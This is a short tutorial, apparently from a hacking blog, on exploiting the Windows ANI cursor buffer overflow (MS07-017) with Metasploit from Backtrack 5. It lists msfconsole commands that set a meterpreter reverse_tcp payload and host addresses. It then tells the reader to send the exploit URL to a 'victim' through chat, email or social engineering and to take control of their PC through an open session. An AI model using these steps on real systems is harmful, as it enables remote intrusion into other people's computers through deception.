This module exploits a buffer overflow vulnerability in the LoadAniIcon() function in USER32.dll. The flaw can be triggered through Internet Explorer 6 and 7 by using the CURSOR style sheet directive to load a malicious .ANI file. The module can also exploit Mozilla Firefox by using a UNC path in a moz-icon URL and serving the .ANI file over WebDAV. The vulnerable code in USER32.dll will catch any exceptions that occur while the invalid cursor is loaded, causing the exploit to silently fail when the wrong target has been chosen. This vulnerability was discovered by Alexander Sotirov of Determina and was rediscovered, in the wild, by McAfee.
Exploit Targets
(Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista (default)
IE6 on Windows NT, 2000, XP, 2003 (all languages)
IE7 on Windows XP SP2, 2003 SP1, SP2 (all languages)
IE7 and Firefox on Windows Vista (all languages)
Firefox on Windows XP (English)
Firefox on Windows 2003 (English)
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/browser/ms07_017_ani_loadimage_chunksize
Msf exploit (ms07_017_ani_loadimage_chunksize)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms07_017_ani_loadimage_chunksize)>set lhost 192.168.1.2 (IP of Local Host)
Msf exploit (ms07_017_ani_loadimage_chunksize)>set srvhost 192.168.1.2 (This must be an address on the local machine)
Msf exploit (ms07_017_ani_loadimage_chunksize set uripath loadimage (The Url to use for this exploit)
Msf exploit (ms07_017_ani_loadimage_chunksize)>exploit
Now an URL you should give to your victim http://192.168.1.2:80/loadimage
Send the link of the server to the victim via chat or email or any social engineering technique.
Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“
